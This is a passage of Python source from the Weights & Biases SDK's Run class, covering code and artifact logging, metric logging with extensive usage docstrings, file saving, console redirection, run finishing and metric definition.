name: (str, optional) The name of our code artifact. By default we'll name
the artifact `source-$RUN_ID`. There may be scenarios where you want
many runs to share the same artifact. Specifying name allows you to achieve that.
include_fn: A callable that accepts a file path and
returns True when it should be included and False otherwise. This
defaults to: `lambda path: path.endswith(".py")`
exclude_fn: A callable that accepts a file path and returns `True` when it should be
excluded and `False` otherwise. Thisdefaults to: `lambda path: False`
Examples:
Basic usage
```python
run.log_code()
```
Advanced usage
```python
run.log_code("../", include_fn=lambda path: path.endswith(".py") or path.endswith(".ipynb"))
```
Returns:
An `Artifact` object if code was logged
"""
name = name or "{}-{}".format("source", self.id)
art = wandb.Artifact(name, "code")
files_added = False
if root is not None:
root = os.path.abspath(root)
for file_path in filenames.filtered_dir(root, include_fn, exclude_fn):
files_added = True
save_name = os.path.relpath(file_path, root)
art.add_file(file_path, name=save_name)
# Add any manually staged files such is ipynb notebooks
for dirpath, _, files in os.walk(self._settings._tmp_code_dir):
for fname in files:
file_path = os.path.join(dirpath, fname)
save_name = os.path.relpath(file_path, self._settings._tmp_code_dir)
files_added = True
art.add_file(file_path, name=save_name)
if not files_added:
return None
return self.log_artifact(art)
def get_url(self) -> Optional[str]:
"""Returns the url for the W&B run, if there is one.
Offline runs will not have a url.
"""
if self._settings._offline:
wandb.termwarn("URL not available in offline run")
return None
return self._settings.run_url
def get_project_url(self) -> Optional[str]:
"""Returns the url for the W&B project associated with the run, if there is one.
Offline runs will not have a project url.
"""
if self._settings._offline:
wandb.termwarn("URL not available in offline run")
return None
return self._settings.project_url
def get_sweep_url(self) -> Optional[str]:
"""Returns the url for the sweep associated with the run, if there is one."""
if self._settings._offline:
wandb.termwarn("URL not available in offline run")
return None
return self._settings.sweep_url
@property
def url(self) -> Optional[str]:
"""Returns the W&B url associated with the run."""
return self.get_url()
@property
def entity(self) -> str:
"""Returns the name of the W&B entity associated with the run.
Entity can be a user name or the name of a team or organization.
"""
return self._entity or ""
def _label_internal(
self, code: str = None, repo: str = None, code_version: str = None
) -> None:
with telemetry.context(run=self) as tel:
if code and RE_LABEL.match(code):
tel.label.code_string = code
if repo and RE_LABEL.match(repo):
tel.label.repo_string = repo
if code_version and RE_LABEL.match(code_version):
tel.label.code_version = code_version
def _label(
self,
code: str = None,
repo: str = None,
code_version: str = None,
**kwargs: str,
) -> None:
if self._settings.label_disable:
return
for k, v in (("code", code), ("repo", repo), ("code_version", code_version)):
if v and not RE_LABEL.match(v):
wandb.termwarn(
"Label added for '{}' with invalid identifier '{}' (ignored).".format(
k, v
),
repeat=False,
)
for v in kwargs:
wandb.termwarn(
"Label added for unsupported key '{}' (ignored).".format(v),
repeat=False,
)
self._label_internal(code=code, repo=repo, code_version=code_version)
# update telemetry in the backend immediately for _label() callers
self._telemetry_flush()
def _label_probe_lines(self, lines: List[str]) -> None:
if not lines:
return
parsed = telemetry._parse_label_lines(lines)
if not parsed:
return
label_dict = {}
code = parsed.get("code") or parsed.get("c")
if code:
label_dict["code"] = code
repo = parsed.get("repo") or parsed.get("r")
if repo:
label_dict["repo"] = repo
code_ver = parsed.get("version") or parsed.get("v")
if code_ver:
label_dict["code_version"] = code_ver
self._label_internal(**label_dict)
def _label_probe_main(self) -> None:
m = sys.modules.get("__main__")
if not m:
return
doc = getattr(m, "__doc__", None)
if not doc:
return
doclines = doc.splitlines()
self._label_probe_lines(doclines)
# TODO: annotate jupyter Notebook class
def _label_probe_notebook(self, notebook: Any) -> None:
logger.info("probe notebook")
lines = None
try:
data = notebook.probe_ipynb()
cell0 = data.get("cells", [])[0]
lines = cell0.get("source")
# kaggle returns a string instead of a list
if isinstance(lines, str):
lines = lines.split()
except Exception as e:
logger.info("Unable to probe notebook: {}".format(e))
return
if lines:
self._label_probe_lines(lines)
def display(self, height: int = 420, hidden: bool = False) -> bool:
"""Displays this run in jupyter."""
if self._settings._jupyter and ipython.in_jupyter():
ipython.display_html(self.to_html(height, hidden))
return True
else:
wandb.termwarn(".display() only works in jupyter environments")
return False
def to_html(self, height: int = 420, hidden: bool = False) -> str:
"""Generates HTML containing an iframe displaying the current run."""
url = self._settings.run_url + "?jupyter=true"
style = f"border:none;width:100%;height:{height}px;"
prefix = ""
if hidden:
style += "display:none;"
prefix = ipython.toggle_button()
return prefix + f'<iframe src="{url}" style="{style}"></iframe>'
def _repr_mimebundle_(
self, include: Any = None, exclude: Any = None
) -> Dict[str, str]:
return {"text/html": self.to_html(hidden=True)}
def _config_callback(
self,
key: Union[Tuple[str, ...], str] = None,
val: Any = None,
data: Dict[str, object] = None,
) -> None:
logger.info("config_cb %s %s %s", key, val, data)
if not self._backend or not self._backend.interface:
return
self._backend.interface.publish_config(key=key, val=val, data=data)
def _config_artifact_callback(
self, key: str, val: Union[str, Artifact]
) -> Union[Artifact, public.Artifact]:
if _is_artifact_string(val):
# this will never fail, but is required to make mypy happy
assert isinstance(val, str)
artifact_string, base_url = parse_artifact_string(val)
overrides = {}
if base_url is not None:
overrides = {"base_url": base_url}
public_api = public.Api(overrides)
else:
public_api = self._public_api()
artifact = public_api.artifact(name=artifact_string)
# in the future we'll need to support using artifacts from
# different instances of wandb. simplest way to do that is
# likely to convert the retrieved public.Artifact to a wandb.Artifact
return self.use_artifact(artifact, use_as=key)
else:
return self.use_artifact(val, use_as=key)
def _set_config_wandb(self, key: str, val: Any) -> None:
self._config_callback(key=("_wandb", key), val=val)
def _summary_update_callback(self, summary_record: SummaryRecord) -> None:
if self._backend and self._backend.interface:
self._backend.interface.publish_summary(summary_record)
def _summary_get_current_summary_callback(self) -> Dict[str, Any]:
if not self._backend or not self._backend.interface:
return {}
ret = self._backend.interface.communicate_get_summary()
if not ret:
return {}
return proto_util.dict_from_proto_list(ret.item)
def _metric_callback(self, metric_record: MetricRecord) -> None:
if self._backend and self._backend.interface:
self._backend.interface._publish_metric(metric_record)
def _datatypes_callback(self, fname: str) -> None:
if not self._backend or not self._backend.interface:
return
files = dict(files=[(glob.escape(fname), "now")])
self._backend.interface.publish_files(files)
def _visualization_hack(self, row: Dict[str, Any]) -> Dict[str, Any]:
# TODO(jhr): move visualize hack somewhere else
custom_charts = {}
for k in row:
if isinstance(row[k], Visualize):
config = {
"id": row[k].viz_id,
"historyFieldSettings": {"key": k, "x-axis": "_step"},
}
row[k] = row[k].value
self._config_callback(val=config, key=("_wandb", "viz", k))
elif isinstance(row[k], CustomChart):
custom_charts[k] = row[k]
custom_chart = row[k]
for k, custom_chart in custom_charts.items():
# remove the chart key from the row
# TODO: is this really the right move? what if the user logs
# a non-custom chart to this key?
row.pop(k)
# add the table under a different key
table_key = k + "_table"
row[table_key] = custom_chart.table
# add the panel
panel_config = custom_chart_panel_config(custom_chart, k, table_key)
self._add_panel(k, "Vega2", panel_config)
return row
def _partial_history_callback(
self, row: Dict[str, Any], step: int, commit: bool = False
) -> None:
if row:
row = self._visualization_hack(row)
row["_timestamp"] = int(row.get("_timestamp", time.time()))
row["_runtime"] = int(row.get("_runtime", time.time() - self.start_time))
if self._backend and self._backend.interface:
not_using_tensorboard = len(wandb.patched["tensorboard"]) == 0
self._backend.interface.publish_partial_history(
row, step, flush=commit, publish_step=not_using_tensorboard,
)
def _console_callback(self, name: str, data: str) -> None:
# logger.info("console callback: %s, %s", name, data)
if self._backend and self._backend.interface:
self._backend.interface.publish_output(name, data)
def _tensorboard_callback(
self, logdir: str, save: bool = None, root_logdir: str = None
) -> None:
logger.info("tensorboard callback: %s, %s", logdir, save)
save = True if save is None else save
if self._backend and self._backend.interface:
self._backend.interface.publish_tbdata(logdir, save, root_logdir)
def _set_library(self, library: _WandbSetup) -> None:
self._wl = library
def _set_backend(self, backend: "wandb.sdk.backend.backend.Backend") -> None:
self._backend = backend
def _set_internal_run_interface(
self,
interface: Union[
"wandb.sdk.interface.interface_queue.InterfaceQueue",
"wandb.sdk.interface.interface_grpc.InterfaceGrpc",
],
) -> None:
self._internal_run_interface = interface
def _set_reporter(self, reporter: Reporter) -> None:
self._reporter = reporter
def _set_teardown_hooks(self, hooks: List[TeardownHook]) -> None:
self._teardown_hooks = hooks
def _set_run_obj(self, run_obj: RunRecord) -> None:
self._run_obj = run_obj
self._entity = run_obj.entity
self._project = run_obj.project
# Grab the config from resuming
if run_obj.config:
c_dict = config_util.dict_no_value_from_proto_list(run_obj.config.update)
# TODO: Windows throws a wild error when this is set...
if "_wandb" in c_dict:
del c_dict["_wandb"]
# We update the config object here without triggering the callback
self.config._update(c_dict, allow_val_change=True, ignore_locked=True)
# Update the summary, this will trigger an un-needed graphql request :(
if run_obj.summary:
summary_dict = {}
for orig in run_obj.summary.update:
summary_dict[orig.key] = json.loads(orig.value_json)
self.summary.update(summary_dict)
self.history_step = self.starting_step
# TODO: It feels weird to call this twice..
sentry_set_scope(
process_context="user", settings_dict=self.settings,
)
def _set_run_obj_offline(self, run_obj: RunRecord) -> None:
self._run_obj_offline = run_obj
def _add_singleton(
self, data_type: str, key: str, value: Dict[Union[int, str], str]
) -> None:
"""Stores a singleton item to wandb config.
A singleton in this context is a piece of data that is continually
logged with the same value in each history step, but represented
as a single item in the config.
We do this to avoid filling up history with a lot of repeated uneccessary data
Add singleton can be called many times in one run and it will only be
updated when the value changes. The last value logged will be the one
persisted to the server.
"""
value_extra = {"type": data_type, "key": key, "value": value}
if data_type not in self.config["_wandb"]:
self.config["_wandb"][data_type] = {}
if data_type in self.config["_wandb"][data_type]:
old_value = self.config["_wandb"][data_type][key]
else:
old_value = None
if value_extra != old_value:
self.config["_wandb"][data_type][key] = value_extra
self.config.persist()
def _log(
self,
data: Dict[str, Any],
step: Optional[int] = None,
commit: Optional[bool] = None,
) -> None:
if not self._settings._require_service:
current_pid = os.getpid()
if current_pid != self._init_pid:
message = "log() ignored (called from pid={}, init called from pid={}). See: https://docs.wandb.ai/library/init#multiprocess".format(
current_pid, self._init_pid
)
if self._settings.strict:
wandb.termerror(message, repeat=False)
raise errors.LogMultiprocessError(
"log() does not support multiprocessing"
)
wandb.termwarn(message, repeat=False)
return
if not isinstance(data, Mapping):
raise ValueError("wandb.log must be passed a dictionary")
if any(not isinstance(key, str) for key in data.keys()):
raise ValueError("Key values passed to `wandb.log` must be strings.")
if step is not None:
# if step is passed in when tensorboard_sync is used we honor the step passed
# to make decisions about how to close out the history record, but will strip
# this history later on in publish_history()
using_tensorboard = len(wandb.patched["tensorboard"]) > 0
if using_tensorboard:
wandb.termwarn(
"Step cannot be set when using syncing with tensorboard. Please log your step values as a metric such as 'global_step'",
repeat=False,
)
if self.history_step > step:
wandb.termwarn(
(
"Step must only increase in log calls. "
"Step {} < {}; dropping {}.".format(
step, self.history_step, data
)
)
)
return
elif step > self.history_step:
self._partial_history_callback(
{}, self.history_step, commit=True,
)
self.history_step = step
elif commit is None: # step is None and commit is None
commit = True
if commit:
self._partial_history_callback(data, self.history_step, commit=True)
self.history_step += 1
else:
self._partial_history_callback(data, self.history_step)
def log(
self,
data: Dict[str, Any],
step: Optional[int] = None,
commit: Optional[bool] = None,
sync: Optional[bool] = None,
) -> None:
"""Logs a dictonary of data to the current run's history.
Use `wandb.log` to log data from runs, such as scalars, images, video,
histograms, plots, and tables.
See our [guides to logging](https://docs.wandb.ai/guides/track/log) for
live examples, code snippets, best practices, and more.
The most basic usage is `wandb.log({"train-loss": 0.5, "accuracy": 0.9})`.
This will save the loss and accuracy to the run's history and update
the summary values for these metrics.
Visualize logged data in the workspace at [wandb.ai](https://wandb.ai),
or locally on a [self-hosted instance](https://docs.wandb.ai/self-hosted)
of the W&B app, or export data to visualize and explore locally, e.g. in
Jupyter notebooks, with [our API](https://docs.wandb.ai/guides/track/public-api-guide).
In the UI, summary values show up in the run table to compare single values across runs.
Summary values can also be set directly with `wandb.run.summary["key"] = value`.
Logged values don't have to be scalars. Logging any wandb object is supported.
For example `wandb.log({"example": wandb.Image("myimage.jpg")})` will log an
example image which will be displayed nicely in the W&B UI.
See the [reference documentation](https://docs.wandb.com/library/reference/data_types)
for all of the different supported types or check out our
[guides to logging](https://docs.wandb.ai/guides/track/log) for examples,
from 3D molecular structures and segmentation masks to PR curves and histograms.
`wandb.Table`s can be used to logged structured data. See our
[guide to logging tables](https://docs.wandb.ai/guides/data-vis/log-tables)
for details.
Logging nested metrics is encouraged and is supported in the W&B UI.
If you log with a nested dictionary like `wandb.log({"train":
{"acc": 0.9}, "val": {"acc": 0.8}})`, the metrics will be organized into
`train` and `val` sections in the W&B UI.
wandb keeps track of a global step, which by default increments with each
call to `wandb.log`, so logging related metrics together is encouraged.
If it's inconvenient to log related metrics together
calling `wandb.log({"train-loss": 0.5, commit=False})` and then
`wandb.log({"accuracy": 0.9})` is equivalent to calling
`wandb.log({"train-loss": 0.5, "accuracy": 0.9})`.
`wandb.log` is not intended to be called more than a few times per second.
If you want to log more frequently than that it's better to aggregate
the data on the client side or you may get degraded performance.
Arguments:
row: (dict, optional) A dict of serializable python objects i.e `str`,
`ints`, `floats`, `Tensors`, `dicts`, or any of the `wandb.data_types`.
commit: (boolean, optional) Save the metrics dict to the wandb server
and increment the step. If false `wandb.log` just updates the current
metrics dict with the row argument and metrics won't be saved until
`wandb.log` is called with `commit=True`.
step: (integer, optional) The global step in processing. This persists
any non-committed earlier steps but defaults to not committing the
specified step.
sync: (boolean, True) This argument is deprecated and currently doesn't
change the behaviour of `wandb.log`.
Examples:
For more and more detailed examples, see
[our guides to logging](https://docs.wandb.com/guides/track/log).
### Basic usage
<!--yeadoc-test:init-and-log-basic-->
```python
import wandb
wandb.init()
wandb.log({'accuracy': 0.9, 'epoch': 5})
```
### Incremental logging
<!--yeadoc-test:init-and-log-incremental-->
```python
import wandb
wandb.init()
wandb.log({'loss': 0.2}, commit=False)
# Somewhere else when I'm ready to report this step:
wandb.log({'accuracy': 0.8})
```
### Histogram
<!--yeadoc-test:init-and-log-histogram-->
```python
import numpy as np
import wandb
# sample gradients at random from normal distribution
gradients = np.random.randn(100, 100)
wandb.init()
wandb.log({"gradients": wandb.Histogram(gradients)})
```
### Image from numpy
<!--yeadoc-test:init-and-log-image-numpy-->
```python
import numpy as np
import wandb
wandb.init()
examples = []
for i in range(3):
pixels = np.random.randint(low=0, high=256, size=(100, 100, 3))
image = wandb.Image(pixels, caption=f"random field {i}")
examples.append(image)
wandb.log({"examples": examples})
```
### Image from PIL
<!--yeadoc-test:init-and-log-image-pillow-->
```python
import numpy as np
from PIL import Image as PILImage
import wandb
wandb.init()
examples = []
for i in range(3):
pixels = np.random.randint(low=0, high=256, size=(100, 100, 3), dtype=np.uint8)
pil_image = PILImage.fromarray(pixels, mode="RGB")
image = wandb.Image(pil_image, caption=f"random field {i}")
examples.append(image)
wandb.log({"examples": examples})
```
### Video from numpy
<!--yeadoc-test:init-and-log-video-numpy-->
```python
import numpy as np
import wandb
wandb.init()
# axes are (time, channel, height, width)
frames = np.random.randint(low=0, high=256, size=(10, 3, 100, 100), dtype=np.uint8)
wandb.log({"video": wandb.Video(frames, fps=4)})
```
### Matplotlib Plot
<!--yeadoc-test:init-and-log-matplotlib-->
```python
from matplotlib import pyplot as plt
import numpy as np
import wandb
wandb.init()
fig, ax = plt.subplots()
x = np.linspace(0, 10)
y = x * x
ax.plot(x, y) # plot y = x^2
wandb.log({"chart": fig})
```
### PR Curve
```python
wandb.log({'pr': wandb.plots.precision_recall(y_test, y_probas, labels)})
```
### 3D Object
```python
wandb.log({"generated_samples":
[wandb.Object3D(open("sample.obj")),
wandb.Object3D(open("sample.gltf")),
wandb.Object3D(open("sample.glb"))]})
```
Raises:
wandb.Error: if called before `wandb.init`
ValueError: if invalid data is passed
"""
if sync is not None:
deprecate.deprecate(
field_name=deprecate.Deprecated.run__log_sync,
warning_message=(
"`sync` argument is deprecated and does not affect the behaviour of `wandb.log`"
),
)
self._log(data=data, step=step, commit=commit)
def save(
self,
glob_str: Optional[str] = None,
base_path: Optional[str] = None,
policy: str = "live",
) -> Union[bool, List[str]]:
"""Ensure all files matching `glob_str` are synced to wandb with the policy specified.
Arguments:
glob_str: (string) a relative or absolute path to a unix glob or regular
path. If this isn't specified the method is a noop.
base_path: (string) the base path to run the glob relative to
policy: (string) on of `live`, `now`, or `end`
- live: upload the file as it changes, overwriting the previous version
- now: upload the file once now
- end: only upload file when the run ends
"""
if glob_str is None:
# noop for historical reasons, run.save() may be called in legacy code
deprecate.deprecate(
field_name=deprecate.Deprecated.run__save_no_args,
warning_message=(
"Calling wandb.run.save without any arguments is deprecated."
"Changes to attributes are automatically persisted."
),
)
return True
if policy not in ("live", "end", "now"):
raise ValueError(
'Only "live" "end" and "now" policies are currently supported.'
)
if isinstance(glob_str, bytes):
glob_str = glob_str.decode("utf-8")
if not isinstance(glob_str, str):
raise ValueError("Must call wandb.save(glob_str) with glob_str a str")
if base_path is None:
if os.path.isabs(glob_str):
base_path = os.path.dirname(glob_str)
wandb.termwarn(
(
"Saving files without folders. If you want to preserve "
"sub directories pass base_path to wandb.save, i.e. "
'wandb.save("/mnt/folder/file.h5", base_path="/mnt")'
)
)
else:
base_path = "."
wandb_glob_str = os.path.relpath(glob_str, base_path)
if ".." + os.sep in wandb_glob_str:
raise ValueError("globs can't walk above base_path")
with telemetry.context(run=self) as tel:
tel.feature.save = True
if glob_str.startswith("gs://") or glob_str.startswith("s3://"):
wandb.termlog(
"%s is a cloud storage url, can't save file to wandb." % glob_str
)
return []
files = glob.glob(os.path.join(self.dir, wandb_glob_str))
warn = False
if len(files) == 0 and "*" in wandb_glob_str:
warn = True
for path in glob.glob(glob_str):
file_name = os.path.relpath(path, base_path)
abs_path = os.path.abspath(path)
wandb_path = os.path.join(self.dir, file_name)
wandb.util.mkdir_exists_ok(os.path.dirname(wandb_path))
# We overwrite symlinks because namespaces can change in Tensorboard
if os.path.islink(wandb_path) and abs_path != os.readlink(wandb_path):
os.remove(wandb_path)
os.symlink(abs_path, wandb_path)
elif not os.path.exists(wandb_path):
os.symlink(abs_path, wandb_path)
files.append(wandb_path)
if warn:
file_str = "%i file" % len(files)
if len(files) > 1:
file_str += "s"
wandb.termwarn(
(
"Symlinked %s into the W&B run directory, "
"call wandb.save again to sync new files."
)
% file_str
)
files_dict = dict(files=[(wandb_glob_str, policy)])
if self._backend and self._backend.interface:
self._backend.interface.publish_files(files_dict)
return files
def restore(
self,
name: str,
run_path: Optional[str] = None,
replace: bool = False,
root: Optional[str] = None,
) -> Union[None, TextIO]:
return restore(name, run_path or self.path, replace, root or self.dir)
def finish(self, exit_code: int = None, quiet: Optional[bool] = None) -> None:
"""Marks a run as finished, and finishes uploading all data.
This is used when creating multiple runs in the same process. We automatically
call this method when your script exits or if you use the run context manager.
Arguments:
exit_code: Set to something other than 0 to mark a run as failed
quiet: Set to true to minimize log output
"""
if quiet is not None:
self._quiet = quiet
with telemetry.context(run=self) as tel:
tel.feature.finish = True
logger.info(f"finishing run {self.path}")
# detach jupyter hooks / others that needs to happen before backend shutdown
for hook in self._teardown_hooks:
if hook.stage == TeardownStage.EARLY:
hook.call()
self._atexit_cleanup(exit_code=exit_code)
if self._wl and len(self._wl._global_run_stack) > 0:
self._wl._global_run_stack.pop()
# detach logger / others meant to be run after we've shutdown the backend
for hook in self._teardown_hooks:
if hook.stage == TeardownStage.LATE:
hook.call()
self._teardown_hooks = []
module.unset_globals()
# inform manager this run is finished
manager = self._wl and self._wl._get_manager()
if manager:
manager._inform_finish(run_id=self.id)
def join(self, exit_code: int = None) -> None:
"""Deprecated alias for `finish()` - please use finish."""
deprecate.deprecate(
field_name=deprecate.Deprecated.run__join,
warning_message=(
"wandb.run.join() is deprecated, please use wandb.run.finish()."
),
)
self.finish(exit_code=exit_code)
# TODO(jhr): annotate this
def plot_table(self, vega_spec_name, data_table, fields, string_fields=None): # type: ignore
"""Creates a custom plot on a table.
Arguments:
vega_spec_name: the name of the spec for the plot
table_key: the key used to log the data table
data_table: a wandb.Table object containing the data to
be used on the visualization
fields: a dict mapping from table keys to fields that the custom
visualization needs
string_fields: a dict that provides values for any string constants
the custom visualization needs
"""
visualization = create_custom_chart(
vega_spec_name, data_table, fields, string_fields or {}
)
return visualization
def _add_panel(
self, visualize_key: str, panel_type: str, panel_config: dict
) -> None:
config = {
"panel_type": panel_type,
"panel_config": panel_config,
}
self._config_callback(val=config, key=("_wandb", "visualize", visualize_key))
def _redirect(
self,
stdout_slave_fd: Optional[int],
stderr_slave_fd: Optional[int],
console: SettingsConsole = None,
) -> None:
if console is None:
console = self._settings._console
logger.info("redirect: %s", console)
out_redir: redirect.RedirectBase
err_redir: redirect.RedirectBase
if console == SettingsConsole.REDIRECT:
logger.info("Redirecting console.")
out_redir = redirect.Redirect(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.Redirect(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
if os.name == "nt":
def wrap_fallback() -> None:
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
msg = (
"Tensorflow detected. Stream redirection is not supported "
"on Windows when tensorflow is imported. Falling back to "
"wrapping stdout/err."
)
wandb.termlog(msg)
self._redirect(None, None, console=SettingsConsole.WRAP)
add_import_hook("tensorflow", wrap_fallback)
elif console == SettingsConsole.WRAP:
logger.info("Wrapping output streams.")
out_redir = redirect.StreamWrapper(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.StreamWrapper(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
elif console == SettingsConsole.OFF:
return
else:
raise ValueError("unhandled console")
try:
out_redir.install()
err_redir.install()
self._out_redir = out_redir
self._err_redir = err_redir
logger.info("Redirects installed.")
except Exception as e:
print(e)
logger.error("Failed to redirect.", exc_info=e)
return
def _restore(self) -> None:
logger.info("restore")
# TODO(jhr): drain and shutdown all threads
if self._use_redirect:
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
return
if self.stdout_redirector:
self.stdout_redirector.restore()
if self.stderr_redirector:
self.stderr_redirector.restore()
if self._save_stdout:
sys.stdout = self._save_stdout
if self._save_stderr:
sys.stderr = self._save_stderr
logger.info("restore done")
def _atexit_cleanup(self, exit_code: int = None) -> None:
if self._backend is None:
logger.warning("process exited without backend configured")
return
if self._atexit_cleanup_called:
return
self._atexit_cleanup_called = True
exit_code = exit_code or self._hooks.exit_code if self._hooks else 0
logger.info(f"got exitcode: {exit_code}")
if exit_code == 0:
# Cleanup our resume file on a clean exit
if os.path.exists(self._settings.resume_fname):
os.remove(self._settings.resume_fname)
self._exit_code = exit_code
report_failure = False
try:
self._on_finish()
except KeyboardInterrupt as ki:
if wandb.wandb_agent._is_running():
raise ki
wandb.termerror("Control-C detected -- Run data was not synced")
if not self._settings._jupyter:
os._exit(-1)
except Exception as e:
if not self._settings._jupyter:
report_failure = True
self._console_stop()
self._backend.cleanup()
logger.error("Problem finishing run", exc_info=e)
wandb.termerror("Problem finishing run")
traceback.print_exception(*sys.exc_info())
else:
self._on_final()
finally:
if report_failure:
os._exit(-1)
def _console_start(self) -> None:
logger.info("atexit reg")
self._hooks = ExitHooks()
self._hooks.hook()
manager = self._wl and self._wl._get_manager()
if not manager:
# NB: manager will perform atexit hook like behavior for outstanding runs
atexit.register(lambda: self._atexit_cleanup())
if self._use_redirect:
# setup fake callback
self._redirect_cb = self._console_callback
output_log_path = os.path.join(self.dir, filenames.OUTPUT_FNAME)
self._output_writer = filesystem.CRDedupedFile(open(output_log_path, "wb"))
self._redirect(self._stdout_slave_fd, self._stderr_slave_fd)
def _console_stop(self) -> None:
self._restore()
if self._output_writer:
self._output_writer.close()
self._output_writer = None
def _on_init(self) -> None:
if self._backend and self._backend.interface:
logger.info("communicating current version")
self._check_version = self._backend.interface.communicate_check_version(
current_version=wandb.__version__
)
logger.info(f"got version response {self._check_version}")
def _on_start(self) -> None:
self._header(
self._check_version, settings=self._settings, printer=self._printer
)
if self._settings.save_code and self._settings.code_dir is not None:
self.log_code(self._settings.code_dir)
# TODO(wandb-service) RunStatusChecker not supported yet (WB-7352)
if self._backend and self._backend.interface and not self._settings._offline:
self._run_status_checker = RunStatusChecker(self._backend.interface)
self._console_start()
self._on_ready()
def _on_attach(self) -> None:
"""Event triggered when run is attached to another run."""
with telemetry.context(run=self) as tel:
tel.feature.attach = True
self._on_ready()
def _on_ready(self) -> None:
"""Event triggered when run is ready for the user."""
# start reporting any telemetry changes
self._telemetry_obj_active = True
self._telemetry_flush()
# object is about to be returned to the user, dont let them modify it
self._freeze()
def _on_finish(self) -> None:
trigger.call("on_finished")
# populate final import telemetry
with telemetry.context(run=self) as tel:
self._telemetry_imports(tel.imports_finish)
if self._run_status_checker:
self._run_status_checker.stop()
# make sure all uncommitted history is flushed
self._partial_history_callback(
{}, self.history_step, commit=True,
)
self._console_stop() # TODO: there's a race here with jupyter console logging
if self._backend and self._backend.interface:
# telemetry could have changed, publish final data
self._telemetry_flush()
# TODO: we need to handle catastrophic failure better
# some tests were timing out on sending exit for reasons not clear to me
self._backend.interface.publish_exit(self._exit_code)
print("")
self._footer_exit_status_info(
self._exit_code, settings=self._settings, printer=self._printer
)
while not (self._poll_exit_response and self._poll_exit_response.done):
if self._backend and self._backend.interface:
self._poll_exit_response = (
self._backend.interface.communicate_poll_exit()
)
logger.info(f"got exit ret: {self._poll_exit_response}")
self._footer_file_pusher_status_info(
self._poll_exit_response, printer=self._printer,
)
time.sleep(0.1)
if self._backend and self._backend.interface:
self._sampled_history = (
self._backend.interface.communicate_sampled_history()
)
self._final_summary = self._backend.interface.communicate_get_summary()
if self._backend:
self._backend.cleanup()
if self._run_status_checker:
self._run_status_checker.join()
def _on_final(self) -> None:
self._footer(
self._sampled_history,
self._final_summary,
self._poll_exit_response,
self._check_version,
self._reporter,
self._quiet,
settings=self._settings,
printer=self._printer,
)
def _save_job_spec(self) -> None:
envdict = dict(python="python3.6", requirements=[],)
varsdict = {"WANDB_DISABLE_CODE": "True"}
source = dict(
git="git@github.com:wandb/examples.git", branch="master", commit="bbd8d23",
)
execdict = dict(
program="train.py",
directory="keras-cnn-fashion",
envvars=varsdict,
args=[],
)
configdict = (dict(self._config),)
artifactsdict = dict(dataset="v1",)
inputdict = dict(config=configdict, artifacts=artifactsdict,)
job_spec = {
"kind": "WandbJob",
"version": "v0",
"environment": envdict,
"source": source,
"exec": execdict,
"input": inputdict,
}
s = json.dumps(job_spec, indent=4)
spec_filename = filenames.JOBSPEC_FNAME
with open(spec_filename, "w") as f:
print(s, file=f)
self.save(spec_filename)
def define_metric(
self,
name: str,
step_metric: Union[str, wandb_metric.Metric, None] = None,
step_sync: bool = None,
hidden: bool = None,
summary: str = None,
goal: str = None,
overwrite: bool = None,
**kwargs: Any,
) -> wandb_metric.Metric:
"""Define metric properties which will later be logged with `wandb.log()`.
Arguments:
name: Name of the metric.
step_metric: Independent variable associated with the metric.
step_sync: Automatically add `step_metric` to history if needed.
Defaults to True if step_metric is specified.
hidden: Hide this metric from automatic plots.
summary: Specify aggregate metrics added to summary.
Supported aggregations: "min,max,mean,best,last,none"
Default aggregation is `copy`
Aggregation `best` defaults to `goal`==`minimize`
goal: Specify direction for optimizing the metric.
Supported directions: "minimize,maximize"
Returns:
A metric object is returned that can be further specified.
"""
if not name:
raise wandb.Error("define_metric() requires non-empty name argument")
for k in kwargs:
wandb.termwarn("Unhandled define_metric() arg: {}".format(k))
if isinstance(step_metric, wandb_metric.Metric):
step_metric = step_metric.name
for arg_name, arg_val, exp_type in (
("name", name, str),
("step_metric", step_metric, str),
("step_sync", step_sync, bool),
("hidden", hidden, bool),
("summary", summary, str),
("goal", goal, str),
("overwrite", overwrite, bool),
):
# NOTE: type checking is broken for isinstance and str
if arg_val is not None and not isinstance(arg_val, exp_type):
arg_type = type(arg_val).__name__
raise wandb.Error(
"Unhandled define_metric() arg: {} type: {}".format(
arg_name, arg_type
)
)
stripped = name[:-1] if name.endswith("*") else name
if "*" in stripped:
raise wandb.Error(
"Unhandled define_metric() arg: name (glob suffixes only): {}".format(
name
)
)
summary_ops: Optional[Sequence[str]] = None
if summary:
summary_items = [s.lower() for s in summary.split(",")]
summary_ops = []
valid = {"min", "max", "mean", "best", "last", "copy", "none"}
for i in summary_items:
if i not in valid:
raise wandb.Error(
"Unhandled define_metric() arg: summary op: {}".format(i)
)
summary_ops.append(i)
goal_cleaned: Optional[str] = None
if goal is not None:
goal_cleaned = goal[:3].lower()
valid_goal = {"min", "max"}
if goal_cleaned not in valid_goal:
raise wandb.Error(
"Unhandled define_metric() arg: goal: {}".format(goal)
)
m = wandb_metric.Metric(
name=name,
step_metric=step_metric,
step_sync=step_sync,
summary=summary_ops,
hidden=hidden,
goal=goal_cleaned,
overwrite=overwrite,
)
m._set_callback(self._metric_callback)
m._commit()
with telemetry.context(run=self) as tel:
tel.feature.metric = True
return m
# TODO(jhr): annotate this
def watch(self, models, criterion=None, log="gradients", log_freq=100, idx=None, log_graph=False) -> None: # type: ignore
wandb.watch(models, criterion, log, log_freq, idx, log_graph)
# TODO(jhr): annotate this
def unwatch(self, models=None) -> None: # type: ignore
wandb.unwatch(models=models)
def _swap_artifact_name(self, artifact_name: str, use_as: Optional[str]) -> str:
artifact_key_string = use_as or artifact_name
replacement_artifact_info = self._launch_artifact_mapping.get(
artifact_key_string
)
if replacement_artifact_info is not None:
new_name = replacement_artifact_info.get("name")
entity = replacement_artifact_info.get("entity")
project = replacement_artifact_info.get("project")
if new_name is None or entity is None or project is None:
raise ValueError(
"Misconfigured artifact in launch config. Must include name, project and entity keys."
)
return f"{entity}/{project}/{new_name}"
